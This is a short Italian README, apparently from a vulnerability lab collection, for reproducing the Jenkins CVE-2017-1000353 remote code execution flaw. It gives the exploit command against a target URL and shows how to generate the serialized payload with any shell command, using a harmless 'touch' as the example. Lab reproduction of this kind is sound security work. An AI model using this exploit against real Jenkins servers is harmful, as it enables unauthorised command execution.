
jenkins CVE-2017-1000353 POC
Come riprodurre la vulnerabilità Jenkins CVE-2017-1000353?
Clona questo repository, usa il payload predefinito jenkins_poc.ser con il seguente comando:
python exploit.py http://your-ip:8080 jenkins_poc.ser
Quindi verrà eseguito touch /tmp/success.
Importante: La generazione del payload dipende dalla versione di Java. È stata testata con successo con openjdk:8u292. Altre versioni di Java potrebbero non funzionare correttamente per la generazione del payload e lo sfruttamento.
jenkins_poc.ser?Scarica CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Se stai usando Docker, puoi usare il seguente comando per garantire la compatibilità:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353